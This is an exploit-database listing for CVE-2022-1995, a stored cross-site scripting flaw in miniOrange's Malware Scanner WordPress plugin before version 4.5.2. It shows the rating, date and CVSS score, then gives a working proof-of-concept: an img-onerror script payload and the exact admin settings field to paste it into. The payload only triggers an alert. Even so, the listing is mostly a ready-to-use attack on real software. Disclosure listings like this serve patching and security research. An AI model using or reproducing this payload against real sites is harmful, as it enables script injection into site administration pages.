Exploit for miniOrange's Malware Scanner < 4.5.2 - Admin+ Stored Cross-Site Scripting CVE-2022-1995

Name: Exploit for miniOrange's Malware Scanner < 4.5.2 - Admin+ Stored Cross-Site Scripting CVE-2022-1995
Rating: 5 (77 reviews)

2022-06-06 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:62FB399D-3327-45D0-B10F-769D2D164903
Put the following payload in the "Advanced Blocking" tab > "Block HTTP Referer's" section > "Add Referer" field: "><img src=x onerror=alert(/XSS/)>